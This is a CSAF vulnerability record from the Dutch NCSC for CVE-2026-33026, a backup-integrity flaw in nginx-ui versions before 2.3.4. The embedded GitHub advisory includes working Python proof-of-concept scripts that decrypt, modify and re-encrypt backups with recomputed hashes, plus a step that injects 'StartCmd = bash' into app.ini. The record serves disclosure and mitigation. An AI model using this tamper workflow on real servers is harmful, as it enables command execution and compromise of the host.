{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33026",
        "tracking": {
            "current_release_date": "2026-04-01T23:20:30.939282Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33026",
            "initial_release_date": "2026-03-30T16:52:58.578235Z",
            "revision_history": [
                {
                    "date": "2026-03-30T16:52:58.578235Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-30T16:53:06.602162Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-30T20:26:12.881896Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-30T20:26:14.414834Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-30T20:38:51.964544Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-30T20:38:53.413893Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-31T07:35:36.134640Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-31T12:05:46.712293Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Products created (1).| References created (15)."
                },
                {
                    "date": "2026-03-31T12:05:53.584296Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-31T15:39:09.797718Z",
                    "number": "10",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-31T16:58:07.536438Z",
                    "number": "11",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-31T19:55:21.019550Z",
                    "number": "12",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-04-01T06:26:58.384235Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T22:58:57.310069Z",
                    "number": "14",
                    "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-04-01T22:58:59.564106Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "15"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/ui <2.3.4",
                                "product": {
                                    "name": "vers:unknown/ui <2.3.4",
                                    "product_id": "CSAFPID-5968318"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "NGINX"
                    }
                ],
                "category": "vendor",
                "name": "NGINX"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.3.4",
                                "product": {
                                    "name": "vers:unknown/<2.3.4",
                                    "product_id": "CSAFPID-5965559"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "nginx-ui"
                    }
                ],
                "category": "vendor",
                "name": "0xJacky"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.3.4",
                                "product": {
                                    "name": "vers:unknown/<2.3.4",
                                    "product_id": "CSAFPID-5982828",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:nginxui:nginx_ui:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "nginx_ui"
                    }
                ],
                "category": "vendor",
                "name": "nginxui"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33026",
            "cwe": {
                "id": "CWE-312",
                "name": "Cleartext Storage of Sensitive Information"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\nThe `nginx-ui` backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.\n\n## Details\nThe backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (`hash_info.txt`) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.\n\nBecause the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.\n\nThe backup system is built around the following workflow:\n\n1. Backup files are compressed into `nginx-ui.zip` and `nginx.zip`.\n2. The files are encrypted using AES-256-CBC.\n3. SHA-256 hashes of the encrypted files are stored in `hash_info.txt`.\n4. The hash file is also encrypted with the same AES key and IV.\n5. 
The AES key and IV are provided to the client as a \"backup security token\".\n\nThis architecture creates a circular trust model:\n\n- The encryption key is available to the client.\n- The integrity metadata is encrypted with that same key.\n- The restore process trusts hashes contained within the backup itself.\n\nBecause the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.\n\n### Environment\n- **OS**: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)\n- **Application Version**: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)\n- **Deployment**: Docker Container default installation\n- **Relevant Source Files**:\n  - `backup_crypto.go`\n  - `backup.go`\n  - `restore.go`\n  - `SystemRestoreContent.vue`\n\n\n## PoC\n1. Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the `.key` file.\n    <img width=\"1483\" height=\"586\" alt=\"image\" src=\"https://github.com/user-attachments/assets/857a1b3f-ce66-4929-a165-2f28393df17f\" />\n\n2. 
Decrypt the `nginx-ui.zip` archive using the obtained token.\n``` \nimport base64\nimport os\nimport sys\nimport zipfile\nfrom io import BytesIO\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\n\ndef decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -> bytes:\n    key = base64.b64decode(key_b64)\n    iv = base64.b64decode(iv_b64)\n    \n    cipher = AES.new(key, AES.MODE_CBC, iv)\n    decrypted = cipher.decrypt(encrypted_data)\n    return unpad(decrypted, AES.block_size)\n\ndef process_local_backup(file_path, token, output_dir):\n    key_b64, iv_b64 = token.split(\":\")\n    os.makedirs(output_dir, exist_ok=True)\n    print(f\"[*] File processing: {file_path}\")\n    \n    with zipfile.ZipFile(file_path, 'r') as main_zip:\n        main_zip.extractall(output_dir)\n        \n    files_to_decrypt = [\"hash_info.txt\", \"nginx-ui.zip\", \"nginx.zip\"]\n    \n    for filename in files_to_decrypt:\n        path = os.path.join(output_dir, filename)\n        if os.path.exists(path):\n            with open(path, \"rb\") as f:\n                encrypted = f.read()\n            \n            decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)\n            \n            out_path = path + \".decrypted\"\n            with open(out_path, \"wb\") as f:\n                f.write(decrypted)\n            print(f\"[*] Successfully decrypted: {out_path}\")\n\n# Manual config\nBACKUP_FILE = \"backup-20260314-151959.zip\" \nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nOUTPUT = \"decrypted\"\n\nif __name__ == \"__main__\":\n    process_local_backup(BACKUP_FILE, TOKEN, OUTPUT)\n```\n\n3. Modify the contained `app.ini` to inject malicious configuration (e.g., `StartCmd = bash`).\n4. Re-compress the files and calculate the new SHA-256 hash.\n5. Update `hash_info.txt` with the new, legitimate-looking hashes for the modified files.\n6. 
Encrypt the bundle again using the original Key and IV.\n```\nimport base64\nimport hashlib\nimport os\nimport zipfile\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\n\ndef encrypt_file(data, key_b64, iv_b64):\n    key = base64.b64decode(key_b64)\n    iv = base64.b64decode(iv_b64)\n    cipher = AES.new(key, AES.MODE_CBC, iv)\n    return cipher.encrypt(pad(data, AES.block_size))\n\ndef build_rebuilt_backup(files, token, output_filename=\"backup_rebuild.zip\"):\n    key_b64, iv_b64 = token.split(\":\")\n    \n    encrypted_blobs = {}\n    for fname in files:\n        with open(fname, \"rb\") as f:\n            data = f.read()\n        \n        blob = encrypt_file(data, key_b64, iv_b64)\n\n        target_name = fname.replace(\".decrypted\", \"\")\n        encrypted_blobs[target_name] = blob\n        print(f\"[*] Cipher {target_name}: {len(blob)} bytes\")\n\n    hash_content = \"\"\n    for name, blob in encrypted_blobs.items():\n        h = hashlib.sha256(blob).hexdigest()\n        hash_content += f\"{name}: {h}\\n\"\n    \n    encrypted_hash_info = encrypt_file(hash_content.encode(), key_b64, iv_b64)\n    encrypted_blobs[\"hash_info.txt\"] = encrypted_hash_info\n\n    with zipfile.ZipFile(output_filename, 'w', compression=zipfile.ZIP_DEFLATED) as zf:\n        for name, blob in encrypted_blobs.items():\n            zf.writestr(name, blob)\n            \n    print(f\"\\n[*] Backup rebuild: {output_filename}\")\n    print(f\"[*] Verificando integridad...\")\n\nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nFILES = [\"nginx-ui.zip.decrypted\", \"nginx.zip.decrypted\"]\n\nif __name__ == \"__main__\":\n    build_rebuilt_backup(FILES, TOKEN)\n```\n7. Upload the tampered backup to the `nginx-ui` restore interface.\n   <img width=\"1059\" height=\"290\" alt=\"image\" src=\"https://github.com/user-attachments/assets/66872685-b85b-4c81-ae24-13c811acba9a\" />\n\n\n8. **Observation**: The system accepts the modified backup. 
Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host.\n   <img width=\"1316\" height=\"627\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2752749e-ac39-4d60-88ca-5058b8e840a6\" />\n\n\n\n## Impact\nAn attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.\n\nPotential impacts include:\n\n- Persistent configuration tampering\n- Backdoor insertion into nginx configuration\n- Execution of attacker-controlled commands depending on configuration settings\n- Full compromise of the nginx-ui instance\n\nThe severity depends on the restore permissions and deployment configuration.\n\n## Recommended Mitigation\n\n1. **Introduce a trusted integrity root**\nIntegrity metadata must not be derived solely from data contained in the backup. Possible solutions include:\n   - Signing backup metadata using a server-side private key\n   - Storing integrity metadata separately from the backup archive\n\n2. **Enforce integrity verification**\nThe restore operation must abort if hash verification fails.\n\n3. **Avoid circular trust models**\nIf encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.\n\n4. 
**Optional cryptographic improvements**\nWhile not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret. Authenticated encryption only detects tampering by parties who do not hold the key, so it does not help while the key is handed to the client; AES-GCM also requires a unique nonce for every file encrypted under the same key, whereas the current format reuses one key and IV for all files.\n\nThis vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.\n\n## Regression\n\nThe fix for the previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.\n\nThe backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.\n\nAs a result, the fundamental integrity weakness remains exploitable even after the previous fix.\n\nA patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.",
                    "title": "github - https://api.github.com/advisories/GHSA-fhh2-gg7w-gwpq"
                },
                {
                    "category": "description",
                    "text": "Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.4, the nginx-ui backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration. This issue has been patched in version 2.3.4.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33026"
                },
                {
                    "category": "description",
                    "text": "Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.4, the nginx-ui backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration. This issue has been patched in version 2.3.4.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33026.json"
                },
                {
                    "category": "other",
                    "text": "0.00012",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "9.4",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "5.2",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product data available from source Certbundde",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd, Is related to an uncommon product vendor",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5965559",
                    "CSAFPID-5968318",
                    "CSAFPID-5982828"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-fhh2-gg7w-gwpq"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33026"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33026.json"
                },
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0931.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-fhh2-gg7w-gwpq"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-g9w5-qffc-6762"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde; github",
                    "url": "https://github.com/advisories/GHSA-fhh2-gg7w-gwpq"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde; cveprojectv5; github; nvd",
                    "url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0931.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0931"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17151"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17152"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17154"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17156"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17158"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-17194"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/advisories/GHSA-5hf2-vhj6-gj9m"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/advisories/GHSA-cp8r-8jvw-v3qg"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/advisories/GHSA-h6c2-x2m2-mwhf"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/advisories/GHSA-m468-xcm6-fxg4"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/advisories/GHSA-m8p8-53vf-8357"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33026"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                        "baseScore": 9.1,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-5965559",
                        "CSAFPID-5968318",
                        "CSAFPID-5982828"
                    ]
                }
            ],
            "title": "CVE-2026-33026"
        }
    ]
}